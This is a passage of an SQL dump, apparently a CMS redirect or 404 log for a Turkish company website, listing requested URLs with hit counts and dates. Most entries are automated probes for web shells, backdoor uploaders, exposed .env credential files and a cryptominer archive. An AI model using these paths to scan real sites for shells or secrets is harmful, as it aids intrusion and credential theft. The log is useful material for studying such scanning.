14:29:23','0000-00-00 00:00:00',301),(45481,'http://3s-technologies.com.tr/tr/phpinfo.php3',NULL,'http://3s-technologies.com.tr/phpinfo.php3','',1,0,'2025-08-22 14:29:23','0000-00-00 00:00:00',301),(45482,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-themeeses-json-main.php',NULL,'','',1,0,'2025-08-23 01:46:37','0000-00-00 00:00:00',301),(45483,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/templates/wp-login.php',NULL,'','',1,0,'2025-08-23 01:46:51','0000-00-00 00:00:00',301),(45484,'http://3s-technologies.com.tr/tr/config.php/rebaxbqw.php/xltavrat.php',NULL,'','',1,0,'2025-08-23 01:46:53','0000-00-00 00:00:00',301),(45485,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/templates/alfa-rex.php',NULL,'','',1,0,'2025-08-23 01:47:00','0000-00-00 00:00:00',301),(45486,'http://3s-technologies.com.tr/tr/aua.php',NULL,'','',11,0,'2025-08-23 03:54:24','0000-00-00 00:00:00',301),(45487,'http://3s-technologies.com.tr/tr/hellminer_linux64.tar.gz.293',NULL,'','',1,0,'2025-08-23 03:54:25','0000-00-00 00:00:00',301),(45488,'http://3s-technologies.com.tr/tr/class-wp-http-proxy.php',NULL,'','',1,0,'2025-08-23 03:54:26','0000-00-00 00:00:00',301),(45489,'http://3s-technologies.com.tr/tr/noop.php',NULL,'','',4,0,'2025-08-23 03:54:27','0000-00-00 00:00:00',301),(45490,'http://3s-technologies.com.tr/tr/theme-insbitn.php',NULL,'','',1,0,'2025-08-23 03:54:28','0000-00-00 00:00:00',301),(45491,'http://3s-technologies.com.tr/tr/hellminer_linux64.tar.gz.273',NULL,'','',1,0,'2025-08-23 03:54:29','0000-00-00 00:00:00',301),(45492,'http://3s-technologies.com.tr/tr/class-wp-filesystem-direct.php',NULL,'','',1,0,'2025-08-23 03:54:30','0000-00-00 00:00:00',301),(45493,'http://3s-technologies.com.tr/tr/hellminer_linux64.tar.gz.357',NULL,'','',1,0,'2025-08-23 03:54:31','0000-00-00 00:00:00',301),(45494,'http://3s-technologies.com.tr/tr/class-wp-filesystem-ftpsockets.php',NULL,'','',1,0,'2025-08-23 03:54:32','0000-00-00 00:00:00',301),(45495,'http://3s-technologies.com.tr/tr/class-wp-privacy-data-export-requests-list-table.php',NULL,'','',1,0,'2025-08-23 03:54:33','0000-00-00 00:00:00',301),(45496,'http://3s-technologies.com.tr/tr/theme-insynwr.php',NULL,'','',1,0,'2025-08-23 03:54:34','0000-00-00 00:00:00',301),(45497,'http://3s-technologies.com.tr/tr/class-wp-block-type.php',NULL,'','',1,0,'2025-08-23 03:54:35','0000-00-00 00:00:00',301),(45498,'http://3s-technologies.com.tr/tr/theme-insbgqw.php',NULL,'','',1,0,'2025-08-23 03:54:36','0000-00-00 00:00:00',301),(45499,'http://3s-technologies.com.tr/tr/class-wp-image-editor.php',NULL,'','',1,0,'2025-08-23 03:54:37','0000-00-00 00:00:00',301),(45500,'http://3s-technologies.com.tr/tr/privacy-tools.php',NULL,'','',1,0,'2025-08-23 03:54:38','0000-00-00 00:00:00',301),(45501,'http://3s-technologies.com.tr/tr/class-wp-script-modules.php',NULL,'','',1,0,'2025-08-23 03:54:38','0000-00-00 00:00:00',301),(45502,'http://3s-technologies.com.tr/tr/jdtroslp.php',NULL,'','',1,0,'2025-08-23 03:54:39','0000-00-00 00:00:00',301),(45503,'http://3s-technologies.com.tr/tr/site-info.php',NULL,'','',1,0,'2025-08-23 03:54:40','0000-00-00 00:00:00',301),(45504,'http://3s-technologies.com.tr/tr/shxrtr.php',NULL,'','',2,0,'2025-08-23 03:54:41','0000-00-00 00:00:00',301),(45505,'http://3s-technologies.com.tr/tr/class-wp-importer.php',NULL,'','',1,0,'2025-08-23 03:54:42','0000-00-00 00:00:00',301),(45506,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/hellopress/wp_filemanager.php',NULL,'','',334,0,'2025-08-23 13:17:03','0000-00-00 00:00:00',301),(45507,'http://mail.3s-technologies.com.tr/tr/xc.php',NULL,'','',9,0,'2025-08-23 13:17:04','0000-00-00 00:00:00',301),(45508,'http://mail.3s-technologies.com.tr/tr/gmo.php',NULL,'','',73,0,'2025-08-23 13:17:04','0000-00-00 00:00:00',301),(45509,'http://mail.3s-technologies.com.tr/tr/lock360.php',NULL,'','',78,0,'2025-08-23 13:17:05','0000-00-00 00:00:00',301),(45510,'http://mail.3s-technologies.com.tr/tr/ar.php',NULL,'','',40,0,'2025-08-23 13:17:05','0000-00-00 00:00:00',301),(45511,'http://mail.3s-technologies.com.tr/tr/we.php',NULL,'','',56,0,'2025-08-23 13:17:06','0000-00-00 00:00:00',301),(45512,'http://mail.3s-technologies.com.tr/tr/abcd.php',NULL,'','',85,0,'2025-08-23 13:17:06','0000-00-00 00:00:00',301),(45513,'http://mail.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/filemanager.php',NULL,'','',9,0,'2025-08-23 13:17:07','0000-00-00 00:00:00',301),(45514,'http://mail.3s-technologies.com.tr/tr/pp.php',NULL,'','',76,0,'2025-08-23 13:17:07','0000-00-00 00:00:00',301),(45515,'http://mail.3s-technologies.com.tr/tr/wp.php',NULL,'','',100,0,'2025-08-23 13:17:08','0000-00-00 00:00:00',301),(45516,'http://mail.3s-technologies.com.tr/tr/geck.php',NULL,'','',33,0,'2025-08-23 13:17:08','0000-00-00 00:00:00',301),(45517,'http://mail.3s-technologies.com.tr/tr/class20.php',NULL,'','',48,0,'2025-08-23 13:17:09','0000-00-00 00:00:00',301),(45518,'http://mail.3s-technologies.com.tr/tr/ol.php',NULL,'','',39,0,'2025-08-23 13:17:09','0000-00-00 00:00:00',301),(45519,'http://mail.3s-technologies.com.tr/tr/wp-gr.php',NULL,'','',28,0,'2025-08-23 13:17:10','0000-00-00 00:00:00',301),(45520,'http://mail.3s-technologies.com.tr/tr/error.php',NULL,'','',43,0,'2025-08-23 13:17:11','0000-00-00 00:00:00',301),(45521,'http://mail.3s-technologies.com.tr/tr/build.php',NULL,'','',26,0,'2025-08-23 13:17:12','0000-00-00 00:00:00',301),(45522,'http://mail.3s-technologies.com.tr/tr/chosen.php',NULL,'','',74,0,'2025-08-23 13:17:13','0000-00-00 00:00:00',301),(45523,'http://mail.3s-technologies.com.tr/tr/size.php',NULL,'','',19,0,'2025-08-23 13:17:14','0000-00-00 00:00:00',301),(45524,'http://mail.3s-technologies.com.tr/tr/fm.php?p=',NULL,'','',1,0,'2025-08-23 13:17:15','0000-00-00 00:00:00',301),(45525,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/video\n',NULL,'','',1,0,'2025-08-23 22:02:58','0000-00-00 00:00:00',301),(45526,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/lib',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/lib/','',6,0,'2025-08-24 04:17:28','0000-00-00 00:00:00',301),(45527,'http://3s-technologies.com.tr/tr/okaay.php',NULL,'http://3s-technologies.com.tr/okaay.php','',4,0,'2025-08-24 04:18:51','0000-00-00 00:00:00',301),(45528,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/components/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/components/index.php','',4,0,'2025-08-24 04:19:20','0000-00-00 00:00:00',301),(45529,'http://3s-technologies.com.tr/tr/pouyaasss.asp',NULL,'http://3s-technologies.com.tr/pouyaasss.asp','',1,0,'2025-08-24 04:19:48','0000-00-00 00:00:00',301),(45530,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comment-edit-link',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comment-edit-link/','',1,0,'2025-08-24 04:19:55','0000-00-00 00:00:00',301),(45531,'http://3s-technologies.com.tr/tr/wp-admin/f.php',NULL,'http://3s-technologies.com.tr/wp-admin/f.php','',1,0,'2025-08-24 04:20:32','0000-00-00 00:00:00',301),(45532,'http://3s-technologies.com.tr/tr/.well-known/404.php',NULL,'http://3s-technologies.com.tr/.well-known/404.php','',2,0,'2025-08-24 04:20:36','0000-00-00 00:00:00',301),(45533,'http://3s-technologies.com.tr/tr/wp-includes/blocks/query',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/query/','',2,0,'2025-08-24 04:20:40','0000-00-00 00:00:00',301),(45534,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-wolf-widget.php',NULL,'http://3s-technologies.com.tr/wp-includes/widgets/class-wp-wolf-widget.php','',2,0,'2025-08-24 04:20:41','0000-00-00 00:00:00',301),(45535,'http://3s-technologies.com.tr/tr/wp-content/ccx',NULL,'http://3s-technologies.com.tr/wp-content/ccx/','',1,0,'2025-08-24 04:21:52','0000-00-00 00:00:00',301),(45536,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/wpx.php',NULL,'http://3s-technologies.com.tr/vendor/phpunit/phpunit/src/Util/PHP/wpx.php','',1,0,'2025-08-24 04:21:57','0000-00-00 00:00:00',301),(45537,'http://3s-technologies.com.tr/tr/wp-admin/epinyins.php',NULL,'http://3s-technologies.com.tr/wp-admin/epinyins.php','',1,0,'2025-08-24 04:21:58','0000-00-00 00:00:00',301),(45538,'http://3s-technologies.com.tr/tr/wp-includes/blocks/button',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/button/','',3,0,'2025-08-24 04:21:59','0000-00-00 00:00:00',301),(45539,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/inc/patterns/index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentytwo/inc/patterns/index.php','',1,0,'2025-08-24 04:22:08','0000-00-00 00:00:00',301),(45540,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/reusable-blocks',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/reusable-blocks/','',1,0,'2025-08-24 04:22:13','0000-00-00 00:00:00',301),(45541,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comments/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comments/index.php','',1,0,'2025-08-24 04:22:16','0000-00-00 00:00:00',301),(45542,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/wpgallery',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/wpgallery/','',1,0,'2025-08-24 04:22:20','0000-00-00 00:00:00',301),(45543,'http://3s-technologies.com.tr/tr/backup/jennie007greene.php',NULL,'http://3s-technologies.com.tr/backup/Jennie007Greene.php','',1,0,'2025-08-24 04:22:21','0000-00-00 00:00:00',301),(45544,'http://3s-technologies.com.tr/tr/microblog/hyper/uploads',NULL,'http://3s-technologies.com.tr/microblog/hyper/uploads/','',1,0,'2025-08-24 04:22:55','0000-00-00 00:00:00',301),(45545,'http://3s-technologies.com.tr/tr/wolf-shell.php',NULL,'http://3s-technologies.com.tr/wolf-shell.php','',6,0,'2025-08-24 04:23:00','0000-00-00 00:00:00',301),(45546,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/sst.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/sst.php','',1,0,'2025-08-24 04:23:03','0000-00-00 00:00:00',301),(45547,'http://3s-technologies.com.tr/tr/wp-admin/includes/let.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/let.php','',1,0,'2025-08-24 04:23:05','0000-00-00 00:00:00',301),(45548,'https://www.3s-technologies.com.tr/tr/hakkımızda\n',NULL,'','',2,0,'2025-08-24 04:32:26','0000-00-00 00:00:00',301),(45549,'http://3s-technologies.com.tr/tr/.bod/.ll',NULL,'','',4,0,'2025-08-24 10:51:41','0000-00-00 00:00:00',301),(45550,'http://3s-technologies.com.tr/tr/2021/01/16/upload-and-download-file-using-multipart-form-over-http',NULL,'','',1,0,'2025-08-24 10:51:43','0000-00-00 00:00:00',301),(45551,'http://3s-technologies.com.tr/tr/catalog',NULL,'','',1,0,'2025-08-24 10:51:47','0000-00-00 00:00:00',301),(45552,'http://3s-technologies.com.tr/tr/content',NULL,'','',9,0,'2025-08-24 10:51:47','0000-00-00 00:00:00',301),(45553,'http://3s-technologies.com.tr/tr/dev.php/laravel',NULL,'','',1,0,'2025-08-24 10:51:48','0000-00-00 00:00:00',301),(45554,'http://3s-technologies.com.tr/tr/file',NULL,'','',1,0,'2025-08-24 10:51:50','0000-00-00 00:00:00',301),(45555,'http://3s-technologies.com.tr/tr/js/filemanager',NULL,'','',1,0,'2025-08-24 10:51:52','0000-00-00 00:00:00',301),(45556,'http://3s-technologies.com.tr/tr/link.php/wp-includes/text',NULL,'','',1,0,'2025-08-24 10:51:53','0000-00-00 00:00:00',301),(45557,'http://3s-technologies.com.tr/tr/mail/backup',NULL,'','',1,0,'2025-08-24 10:51:53','0000-00-00 00:00:00',301),(45558,'http://3s-technologies.com.tr/tr/media/filemanager',NULL,'','',1,0,'2025-08-24 10:51:54','0000-00-00 00:00:00',301),(45559,'http://3s-technologies.com.tr/tr/profiles',NULL,'','',1,0,'2025-08-24 10:51:54','0000-00-00 00:00:00',301),(45560,'http://3s-technologies.com.tr/tr/resources',NULL,'','',1,0,'2025-08-24 10:51:55','0000-00-00 00:00:00',301),(45561,'http://3s-technologies.com.tr/tr/update',NULL,'','',4,0,'2025-08-24 10:51:56','0000-00-00 00:00:00',301),(45562,'http://3s-technologies.com.tr/tr/wp-admin/wp-admin',NULL,'','',1,0,'2025-08-24 10:52:04','0000-00-00 00:00:00',301),(45563,'http://3s-technologies.com.tr/tr/wp-content/index.php/wp-includes/text',NULL,'','',1,0,'2025-08-24 10:52:06','0000-00-00 00:00:00',301),(45564,'http://3s-technologies.com.tr/tr/wp-content/packed.php/wp-includes/text',NULL,'','',1,0,'2025-08-24 10:52:07','0000-00-00 00:00:00',301),(45565,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioxi',NULL,'','',1,0,'2025-08-24 10:52:08','0000-00-00 00:00:00',301),(45566,'http://3s-technologies.com.tr/tr/wp-content/plugins/rxr',NULL,'','',1,0,'2025-08-24 10:52:08','0000-00-00 00:00:00',301),(45567,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/admin',NULL,'','',1,0,'2025-08-24 10:52:09','0000-00-00 00:00:00',301),(45568,'http://3s-technologies.com.tr/tr/wp-content/plugins/yanierin',NULL,'','',1,0,'2025-08-24 10:52:10','0000-00-00 00:00:00',301),(45569,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/json.php/wp-content/uploads',NULL,'','',1,0,'2025-08-24 10:52:10','0000-00-00 00:00:00',301),(45570,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone',NULL,'','',1,0,'2025-08-24 10:52:11','0000-00-00 00:00:00',301),(45571,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree',NULL,'','',3,0,'2025-08-24 10:52:12','0000-00-00 00:00:00',301),(45572,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo',NULL,'','',1,0,'2025-08-24 10:52:12','0000-00-00 00:00:00',301),(45573,'http://3s-technologies.com.tr/tr/wp-content/uploads/index.php/wp-includes/text',NULL,'','',1,0,'2025-08-24 10:52:15','0000-00-00 00:00:00',301),(45574,'http://3s-technologies.com.tr/tr/wp-includes/id3/index.php/wp-includes/text',NULL,'','',1,0,'2025-08-24 10:52:17','0000-00-00 00:00:00',301),(45575,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/decode/html',NULL,'','',1,0,'2025-08-24 10:52:18','0000-00-00 00:00:00',301),(45576,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/xml',NULL,'','',9,0,'2025-08-24 10:52:18','0000-00-00 00:00:00',301),(45577,'http://3s-technologies.com.tr/tr/wp-includes/bk',NULL,'','',12,0,'2025-08-24 10:52:19','0000-00-00 00:00:00',301),(45578,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/editor',NULL,'','',1,0,'2025-08-24 10:52:21','0000-00-00 00:00:00',301),(45579,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/fullscreen',NULL,'','',7,0,'2025-08-24 10:52:25','0000-00-00 00:00:00',301),(45580,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/curve25519/ge',NULL,'','',1,0,'2025-08-24 10:52:26','0000-00-00 00:00:00',301),(45581,'http://3s-technologies.com.tr/tr/bibil.php',NULL,'','',37,0,'2025-08-24 20:12:22','0000-00-00 00:00:00',301),(45582,'http://3s-technologies.com.tr/tr/jvirglze.php',NULL,'','',2,0,'2025-08-24 20:12:24','0000-00-00 00:00:00',301),(45583,'http://3s-technologies.com.tr/tr/xbgqdfrj.php',NULL,'','',1,0,'2025-08-24 20:12:34','0000-00-00 00:00:00',301),(45584,'https://mail.3s-technologies.com.tr/tr/admin/.env',NULL,'https://mail.3s-technologies.com.tr/admin/.env','',4,0,'2025-08-25 00:59:45','0000-00-00 00:00:00',301),(45585,'https://mail.3s-technologies.com.tr/tr/core/.env',NULL,'https://mail.3s-technologies.com.tr/core/.env','',1,0,'2025-08-25 00:59:45','0000-00-00 00:00:00',301),(45586,'http://www.3s-technologies.com.tr/en/ahşap-işleme-wood-processing-120cm\n',NULL,'','',2,0,'2025-08-25 04:14:29','0000-00-00 00:00:00',301),(45587,'http://3s-technologies.com.tr/tr/json.php',NULL,'','',10,0,'2025-08-25 06:50:17','0000-00-00 00:00:00',301),(45588,'http://3s-technologies.com.tr/tr/jcrop.php',NULL,'','',22,0,'2025-08-25 06:50:28','0000-00-00 00:00:00',301),(45589,'http://3s-technologies.com.tr/tr/rnepv9.php',NULL,'','',3,0,'2025-08-25 06:50:33','0000-00-00 00:00:00',301),(45590,'http://3s-technologies.com.tr/tr/jq.php',NULL,'','',13,0,'2025-08-25 11:16:53','0000-00-00 00:00:00',301),(45591,'http://3s-technologies.com.tr/tr/jemp.php',NULL,'','',1,0,'2025-08-25 11:16:54','0000-00-00 00:00:00',301),(45592,'http://3s-technologies.com.tr/tr/usep.php',NULL,'','',33,0,'2025-08-25 11:16:54','0000-00-00 00:00:00',301),(45593,'http://3s-technologies.com.tr/tr/hikaru.php',NULL,'','',1,0,'2025-08-25 11:17:07','0000-00-00 00:00:00',301),(45594,'https://www.3s-technologies.com.tr/tr/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://www.3s-technologies.com.tr/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',3,0,'2025-08-25 12:13:55','0000-00-00 00:00:00',301),(45595,'https://3s-technologies.com.tr/tr/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://3s-technologies.com.tr/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',5,0,'2025-08-25 12:13:55','0000-00-00 00:00:00',301),(45596,'http://3s-technologies.com.tr/tr/shorw.php',NULL,'','',11,0,'2025-08-25 15:51:22','0000-00-00 00:00:00',301),(45597,'http://3s-technologies.com.tr/tr/berax.php',NULL,'','',12,0,'2025-08-25 15:51:24','0000-00-00 00:00:00',301),(45598,'http://3s-technologies.com.tr/tr/yu123.php',NULL,'','',1,0,'2025-08-25 15:51:27','0000-00-00 00:00:00',301),(45599,'http://3s-technologies.com.tr/tr/feed-atom.php',NULL,'','',1,0,'2025-08-25 15:51:32','0000-00-00 00:00:00',301),(45600,'http://3s-technologies.com.tr/tr/wp-admin/maint/up.php',NULL,'','',2,0,'2025-08-25 20:49:23','0000-00-00 00:00:00',301),(45601,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/wp.php',NULL,'','',2,0,'2025-08-25 20:49:41','0000-00-00 00:00:00',301),(45602,'http://3s-technologies.com.tr/tr/wp-admin/wp-trackback.php',NULL,'','',2,0,'2025-08-25 20:49:46','0000-00-00 00:00:00',301),(45603,'http://3s-technologies.com.tr/tr/ext.php',NULL,'','',45,0,'2025-08-26 02:16:17','0000-00-00 00:00:00',301),(45604,'http://3s-technologies.com.tr/tr/alfadheat.php',NULL,'','',2,0,'2025-08-26 02:50:08','0000-00-00 00:00:00',301),(45605,'https://www.3s-technologies.com.tr/tr/media/images/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://www.3s-technologies.com.tr/media/images/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',4,0,'2025-08-26 17:14:16','0000-00-00 00:00:00',301),(45606,'https://3s-technologies.com.tr/tr/media/images/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://3s-technologies.com.tr/media/images/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',4,0,'2025-08-26 17:14:16','0000-00-00 00:00:00',301),(45607,'http://www.3s-technologies.com.tr/en/pcb-prototip-prototyping\n',NULL,'','',1,0,'2025-08-26 20:25:57','0000-00-00 00:00:00',301),(45608,'http://mail.3s-technologies.com.tr/tr/file17.php',NULL,'','',20,0,'2025-08-27 08:38:58','0000-00-00 00:00:00',301),(45609,'http://mail.3s-technologies.com.tr/tr/file8.php',NULL,'','',12,0,'2025-08-27 08:38:59','0000-00-00 00:00:00',301),(45610,'http://mail.3s-technologies.com.tr/tr/file.php',NULL,'','',137,0,'2025-08-27 08:39:00','0000-00-00 00:00:00',301),(45611,'http://mail.3s-technologies.com.tr/tr/file15.php',NULL,'','',23,0,'2025-08-27 08:39:01','0000-00-00 00:00:00',301),(45612,'http://mail.3s-technologies.com.tr/tr/file3.php',NULL,'','',18,0,'2025-08-27 08:39:02','0000-00-00 00:00:00',301),(45613,'http://mail.3s-technologies.com.tr/tr/file2.php',NULL,'','',46,0,'2025-08-27 08:39:03','0000-00-00 00:00:00',301),(45614,'http://mail.3s-technologies.com.tr/tr/file6.php',NULL,'','',22,0,'2025-08-27 08:39:04','0000-00-00 00:00:00',301),(45615,'http://mail.3s-technologies.com.tr/tr/file9.php',NULL,'','',43,0,'2025-08-27 08:39:05','0000-00-00 00:00:00',301),(45616,'http://mail.3s-technologies.com.tr/tr/file5.php',NULL,'','',33,0,'2025-08-27 08:39:05','0000-00-00 00:00:00',301),(45617,'http://mail.3s-technologies.com.tr/tr/file7.php',NULL,'','',38,0,'2025-08-27 08:39:06','0000-00-00 00:00:00',301),(45618,'http://mail.3s-technologies.com.tr/tr/aa.php',NULL,'','',90,0,'2025-08-27 08:39:08','0000-00-00 00:00:00',301),(45619,'http://mail.3s-technologies.com.tr/tr/law.php',NULL,'','',9,0,'2025-08-27 08:39:09','0000-00-00 00:00:00',301),(45620,'http://mail.3s-technologies.com.tr/tr/goods.php',NULL,'','',47,0,'2025-08-27 08:39:11','0000-00-00 00:00:00',301),(45621,'http://mail.3s-technologies.com.tr/tr/law2.php',NULL,'','',1,0,'2025-08-27 08:39:12','0000-00-00 00:00:00',301),(45622,'http://mail.3s-technologies.com.tr/tr/.trash7309/index.php',NULL,'','',4,0,'2025-08-27 08:39:14','0000-00-00 00:00:00',301),(45623,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/wp-conflg.php',NULL,'','',40,0,'2025-08-27 08:39:14','0000-00-00 00:00:00',301),(45624,'http://mail.3s-technologies.com.tr/tr/wp-content/wp-conflg.php',NULL,'','',5,0,'2025-08-27 08:39:17','0000-00-00 00:00:00',301),(45625,'http://mail.3s-technologies.com.tr/tr/wp-admin/file.php',NULL,'','',3,0,'2025-08-27 08:39:18','0000-00-00 00:00:00',301),(45626,'http://mail.3s-technologies.com.tr/tr/wp-includes/id3/index.php',NULL,'','',25,0,'2025-08-27 08:39:19','0000-00-00 00:00:00',301),(45627,'http://mail.3s-technologies.com.tr/tr/wp-admin/wp-conflg.php',NULL,'','',30,0,'2025-08-27 08:39:20','0000-00-00 00:00:00',301),(45628,'http://mail.3s-technologies.com.tr/tr/faq.php',NULL,'','',4,0,'2025-08-27 08:39:22','0000-00-00 00:00:00',301),(45629,'http://mail.3s-technologies.com.tr/tr/wp-conflg.php',NULL,'','',15,0,'2025-08-27 08:39:23','0000-00-00 00:00:00',301),(45630,'http://mail.3s-technologies.com.tr/tr/simple.php',NULL,'','',71,0,'2025-08-27 08:39:26','0000-00-00 00:00:00',301),(45631,'http://3s-technologies.com.tr/tr/amigo.php',NULL,'','',1,0,'2025-08-27 16:34:44','0000-00-00 00:00:00',301),(45632,'http://3s-technologies.com.tr/tr/yoi.php',NULL,'','',1,0,'2025-08-27 16:34:49','0000-00-00 00:00:00',301),(45633,'http://3s-technologies.com.tr/tr/wp-admin/codeboy1877_up.php',NULL,'','',1,0,'2025-08-27 16:34:52','0000-00-00 00:00:00',301),(45634,'http://3s-technologies.com.tr/tr/wp-includes/codeboy1877_up.php',NULL,'','',1,0,'2025-08-27 16:34:53','0000-00-00 00:00:00',301),(45635,'http://3s-technologies.com.tr/tr/i3wfj.php',NULL,'','',1,0,'2025-08-27 16:34:56','0000-00-00 00:00:00',301),(45636,'http://3s-technologies.com.tr/tr/s46v1.php',NULL,'','',1,0,'2025-08-27 16:34:59','0000-00-00 00:00:00',301),(45637,'http://3s-technologies.com.tr/tr/djfksr4.php',NULL,'','',1,0,'2025-08-27 16:35:01','0000-00-00 00:00:00',301),(45638,'http://3s-technologies.com.tr/tr/p7m94.php',NULL,'','',1,0,'2025-08-27 16:35:03','0000-00-00 00:00:00',301),(45639,'http://3s-technologies.com.tr/tr/we1y8.php',NULL,'','',1,0,'2025-08-27 16:35:05','0000-00-00 00:00:00',301),(45640,'http://3s-technologies.com.tr/tr/jdimzmtaas.php',NULL,'','',2,0,'2025-08-27 16:35:06','0000-00-00 00:00:00',301),(45641,'http://3s-technologies.com.tr/tr/wp-content/iu.php',NULL,'','',1,0,'2025-08-27 16:35:08','0000-00-00 00:00:00',301),(45642,'http://3s-technologies.com.tr/tr/ccx/th3_err0r.php',NULL,'','',1,0,'2025-08-27 16:35:10','0000-00-00 00:00:00',301),(45643,'http://3s-technologies.com.tr/tr/wp-content/codeboy1877_up.php',NULL,'','',1,0,'2025-08-27 16:35:17','0000-00-00 00:00:00',301),(45644,'http://3s-technologies.com.tr/tr/post-data.php',NULL,'','',1,0,'2025-08-27 16:35:20','0000-00-00 00:00:00',301),(45645,'http://3s-technologies.com.tr/tr/w0.php',NULL,'','',2,0,'2025-08-27 16:35:22','0000-00-00 00:00:00',301),(45646,'http://3s-technologies.com.tr/tr/wp-content/small.php',NULL,'','',1,0,'2025-08-27 16:35:27','0000-00-00 00:00:00',301),(45647,'http://3s-technologies.com.tr/tr/wp-content/mode.php',NULL,'','',1,0,'2025-08-27 16:35:29','0000-00-00 00:00:00',301),(45648,'http://3s-technologies.com.tr/tr/archives.php',NULL,'','',2,0,'2025-08-27 16:35:36','0000-00-00 00:00:00',301),(45649,'http://3s-technologies.com.tr/tr/po8sa.php',NULL,'','',1,0,'2025-08-27 16:35:37','0000-00-00 00:00:00',301),(45650,'http://3s-technologies.com.tr/tr/thesmartestx.php',NULL,'','',2,0,'2025-08-27 16:35:39','0000-00-00 00:00:00',301),(45651,'http://3s-technologies.com.tr/tr/zcanp.php',NULL,'','',1,0,'2025-08-27 16:35:41','0000-00-00 00:00:00',301),(45652,'http://3s-technologies.com.tr/tr/burjuva.aspx',NULL,'','',1,0,'2025-08-27 16:35:42','0000-00-00 00:00:00',301),(45653,'http://3s-technologies.com.tr/tr/pvt.php',NULL,'','',1,0,'2025-08-27 16:35:43','0000-00-00 00:00:00',301),(45654,'http://3s-technologies.com.tr/tr/crypted.php',NULL,'','',1,0,'2025-08-27 16:35:48','0000-00-00 00:00:00',301),(45655,'http://3s-technologies.com.tr/tr/h0110w4y.php',NULL,'','',1,0,'2025-08-27 16:35:49','0000-00-00 00:00:00',301),(45656,'http://3s-technologies.com.tr/tr/vesiw.php',NULL,'','',1,0,'2025-08-27 16:35:50','0000-00-00 00:00:00',301),(45657,'http://3s-technologies.com.tr/tr/wp-db.php',NULL,'','',2,0,'2025-08-27 16:35:53','0000-00-00 00:00:00',301),(45658,'http://3s-technologies.com.tr/tr/wp-includes/lx.php',NULL,'','',1,0,'2025-08-27 16:35:55','0000-00-00 00:00:00',301),(45659,'http://3s-technologies.com.tr/tr/wp-content/ice.php',NULL,'','',1,0,'2025-08-27 16:35:57','0000-00-00 00:00:00',301),(45660,'http://3s-technologies.com.tr/tr/wp-content/lx.php',NULL,'','',1,0,'2025-08-27 16:35:58','0000-00-00 00:00:00',301),(45661,'http://3s-technologies.com.tr/tr/rak.php',NULL,'','',6,0,'2025-08-27 17:11:53','0000-00-00 00:00:00',301),(45662,'http://3s-technologies.com.tr/tr/wo.php',NULL,'','',21,0,'2025-08-27 17:11:55','0000-00-00 00:00:00',301),(45663,'http://3s-technologies.com.tr/tr/pv.php',NULL,'','',1,0,'2025-08-27 17:11:56','0000-00-00 00:00:00',301),(45664,'http://3s-technologies.com.tr/tr/;k.php',NULL,'','',7,0,'2025-08-27 17:12:01','0000-00-00 00:00:00',301),(45665,'http://3s-technologies.com.tr/tr/sup.php',NULL,'','',1,0,'2025-08-27 17:12:02','0000-00-00 00:00:00',301),(45666,'http://3s-technologies.com.tr/tr/rspp.php',NULL,'','',1,0,'2025-08-27 17:12:03','0000-00-00 00:00:00',301),(45667,'http://3s-technologies.com.tr/tr/_podt.php',NULL,'','',1,0,'2025-08-27 17:12:05','0000-00-00 